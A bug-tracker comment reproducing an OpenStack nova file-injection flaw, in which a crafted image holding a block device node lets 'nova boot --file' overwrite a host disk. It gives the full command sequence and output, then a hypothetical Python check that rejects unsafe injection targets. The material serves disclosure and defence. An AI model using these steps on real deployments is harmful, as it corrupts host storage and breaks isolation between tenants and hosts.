Comment 3 for bug 1552042

Lee Yarwood (lyarwood) wrote :

I've confirmed that this is exploitable after talking to Matt; notes below, using an up-to-date devstack env:

- libguestfs not installed on this Fedora 22 host.
- use_cow_images = False
- force_config_drive = False
- inject_partition = 0

- Customise an image to include a special block file pointing to a host device :

$ virt-customize -a cirros-0.3.4-x86_64-disk.img --run-command 'mknod host-device b 252 0'
[ 0.0] Examining the guest ...
[ 14.4] Setting a random seed
[ 14.4] Running: mknod host-device b 252 0
[ 14.5] Finishing off

- Write a marker to the host device before starting an instance :

root@host $ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 55G 0 disk
|-sda1 8:1 0 500M 0 part /boot
|-sda2 8:2 0 615M 0 part [SWAP]
`-sda3 8:3 0 53.9G 0 part /
vda 252:0 0 1G 0 disk
root@host $ echo 'Before starting an instance' > /dev/vda
root@host $ strings /dev/vda
Before starting an instance

- Upload the image and start an instance, injecting a file into the special block file previously created :

$ glance image-create --name cirros-fake-dev --file cirros-0.3.4-x86_64-disk.img --disk-format qcow2 --container-format bare
[..]
$ cat test-file
After running an instance
$ nova boot --image cirros-fake-dev --file /host-device=test-file --flavor 1 test-inject
[..]

- Confirm this is seen in the host :

root@host $ strings /dev/vda
After running an instance
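
A defensive check for the condition reproduced above, as an added example that is not part of the original comment and is not nova's code: before writing an injected file into a guest filesystem mounted on the host, refuse any target that is not a regular file inside the guest tree. The names `inject_file` and `UnsafeInjectionTarget` and the `guest_root` argument are hypothetical.

```python
import os
import stat


class UnsafeInjectionTarget(Exception):
    """Raised when an injection path is not a plain file inside the guest tree."""


def inject_file(guest_root, guest_path, data):
    """Write data to guest_path below guest_root (a host-mounted guest filesystem).

    Hypothetical helper: refuses device nodes, FIFOs, sockets, symlinks and
    any path whose parent directory resolves outside guest_root.
    """
    root = os.path.realpath(guest_root)
    joined = os.path.join(root, guest_path.lstrip("/"))
    parent = os.path.realpath(os.path.dirname(joined))
    if os.path.commonpath([root, parent]) != root:
        raise UnsafeInjectionTarget("parent of %s escapes the guest root" % guest_path)
    target = os.path.join(parent, os.path.basename(joined))

    # Inspect an existing entry without following or opening it: opening a
    # device node is already an operation on the host device it names.
    try:
        mode = os.lstat(target).st_mode
    except FileNotFoundError:
        mode = None
    if mode is not None and not stat.S_ISREG(mode):
        raise UnsafeInjectionTarget("%s is not a regular file" % guest_path)

    # O_NOFOLLOW plus fstat on the open descriptor closes the window between
    # the lstat above and the open; O_NONBLOCK avoids hanging on a FIFO that
    # was swapped in during that window.
    flags = os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW | os.O_NONBLOCK
    fd = os.open(target, flags, 0o600)
    with os.fdopen(fd, "wb") as fh:
        if not stat.S_ISREG(os.fstat(fh.fileno()).st_mode):
            raise UnsafeInjectionTarget("%s changed type before open" % guest_path)
        fh.truncate(0)
        fh.write(data)
    return target
```

Mounting the guest filesystem with the `nodev` option gives the same protection at the kernel level, since device nodes on a `nodev` mount cannot be opened.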